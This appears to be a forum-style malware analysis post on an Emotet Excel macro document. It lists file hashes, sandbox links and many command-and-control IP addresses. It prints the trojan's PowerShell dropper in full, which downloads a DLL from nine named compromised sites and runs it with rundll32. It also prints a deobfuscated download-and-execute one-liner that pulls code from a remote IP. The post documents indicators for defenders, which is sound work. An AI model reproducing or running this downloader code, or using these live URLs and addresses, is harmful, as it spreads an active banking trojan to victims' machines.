Introduction → Excel document uses XLM macros to execute command prompt to download/run MSHTA (Microsoft HTML Applications) script. Emotet is a trojan that is primarily spread through spam emails.
Emotet Hash → 3537ad7979bdcd294c534ed3fa174b34_Uwp2XxU2yzt21weDcM2
ssd.dll → 0648dc98932e4d08e2a3f38870f09d1186bda953e26e84aa1578b51b3192f3ce
[color=#FF00]Link (Dangerous): [/color] hxxp://lavandalabs.com/wp-content/414-41121/?i=1
Scan results: https://tria.ge/220120-sk5s2sadg5 || https://tria.ge/220120-s4z2xaaedk/behavioral1
Useful Links:
https://github.com/jstrosch/malware-samples/tree/master/maldocs/emotet/2021/December
https://tria.ge/220120-sx7s6saeb8/behavioral2
[color=#FF00]DO NOT ENTER ANY OF THESE CONNECTIONS BECAUSE IS RISKY[/color]
- Requests / Connections:
$path = "C:\Users\Public\Documents\ssd.dll";
$url1 = 'http://seven-lines.com/wp-includes/QEGNF4XUSR2Ps/';
$url2 = 'http://quranthemepark.com/wp-content/OaIz2gBtm/';
$url3 = 'http://vnvoron.xyz/cgi-bin/AiWOYIHrf2i/';
$url4 = 'https://kaartinen.org/wp-admin/VfrVgxko15aJxtzZS/';
$url5 = 'https://hrlinkedasia.com/b/1Bz/';
$url6 = 'http://ntust-arch-2021-api.monoame.com/licenses/e74DJx6t/';
$url7 = 'http://customtshirt.sogoflowers.com/cgi-bin/wZEOjYNa/';
$url8 = 'http://alruwayuh.com/V7CFVVFY/9ZMNqV/';
$url9 = 'https://wordpress15.aftershipdemo.com/wordpress/fGmhYvSkc8uJu/';
$web = New-Object net.webclient;
$urls = "$url1,$url2,$url3,$url4,$url5,$url6,$url7,$url8,$url9,$url10".split(",");
foreach ($url in $urls) {
try {
$web.DownloadFile($url, $path);
if ((Get-Item $path).Length -ge 30000) {
[Diagnostics.Process];
break;
}
}
catch{}
}
Sleep -s 4;cmd /c C:\Windows\SysWow64\rundll32.exe 'C:\Users\Public\Documents\ssd.dll',AnyString;
Deobfuscated Text:
# powershell snippet 0
$c1 = "(New-Object Net.We"
$c4 = "bClient).Downlo"
$c3 = "adString('http://92.255.57.195/sec/se1.png')"
$ji = "(New-Object Net.WebClient).DownloadString('http://92.255.57.195/sec/se1.png')"
invoke-expression "(New-Object Net.WebClient).DownloadString('http://92.255.57.195/sec/se1.png')"|invoke-expression
# powershell snippet 1
(new-object net.webclient).downloadstring("http://92.255.57.195/sec/se1.png")
92.255.57.195
45.138.98.34:80
45.138.98.34:80
69.16.218.101:8080
69.16.218.101:8080
51.210.242.234:8080
51.210.242.234:8080
185.148.168.220:8080
185.148.168.220:8080
142.4.219.173:8080
142.4.219.173:8080
54.38.242.185:443
54.38.242.185:443
191.252.103.16:80
191.252.103.16:80
104.131.62.48:8080
104.131.62.48:8080
62.171.178.147:8080
62.171.178.147:8080
217.182.143.207:443
217.182.143.207:443
168.197.250.14:80
168.197.250.14:80
37.44.244.177:8080
37.44.244.177:8080
66.42.57.149:443
66.42.57.149:443
210.57.209.142:8080
210.57.209.142:8080
159.69.237.188:443
159.69.237.188:443
116.124.128.206:8080
116.124.128.206:8080
128.199.192.135:8080
128.199.192.135:8080
195.154.146.35:443
195.154.146.35:443
185.148.168.15:8080
185.148.168.15:8080
195.77.239.39:8080
195.77.239.39:8080
207.148.81.119:8080
207.148.81.119:8080
85.214.67.203:8080
85.214.67.203:8080
190.90.233.66:443
190.90.233.66:443
78.46.73.125:443
78.46.73.125:443
78.47.204.80:443
78.47.204.80:443
37.59.209.141:8080
37.59.209.141:8080
54.37.228.122:443
http://seven-lines.com/wp-includes/QEGNF4XUSR2Ps/
quranthemepark.com
http://quranthemepark.com/wp-content/OaIz2gBtm/
vnvoron.xyz
http://vnvoron.xyz/cgi-bin/AiWOYIHrf2i/
kaartinen.org
https://kaartinen.org/wp-admin/VfrVgxko15aJxtzZS/
https://69.16.218.101:8080/CfbbylNqdTdBxEDXHDIBfOPDSZfLTMylLoYA
DLL File -> <https://tria.ge/samples/220120-s4z2xaaedk/behavioral1/files/0x001300000000b52f-62.dat> (Do not report this website because it is trusted)
- Malware Config:
MFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAE2DWT12OLUMXfzeFp+bE2AJubVDsW
NqJdRC6yODDYRzYuuNL0i2rI2Ex6RUQaBvqPOL7a+wCWnIQszh42gCRQlg==
-----END PUBLIC KEY-----
-----BEGIN PUBLIC KEY-----
MFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAE9C8agzYaJ1GMJPLKqOyFrlJZUXVI
lAZwAnOq6JrEKHtWCQ+8CHuAIXqmKH6WRbnDw1wmdM/YvqKFH36nqC2VNA==
-----END PUBLIC KEY-----
Detected System File Dropper → C:\Windows\SysWOW64\Thvwufopkgnho\syffbisksfart.hwt
- Other Information
Registries:
Create → \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0~MHz
Create → \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0~MHz
IP Information:
Country → Russian (RU)
City → Moscow
ISP → Telecom SP Ltd
Topic Tags:
trojan stealer Phishing Malware macro #obfuscated #javascript-malware #suspicious-identificators #cmd, #suspicious-image-iplogger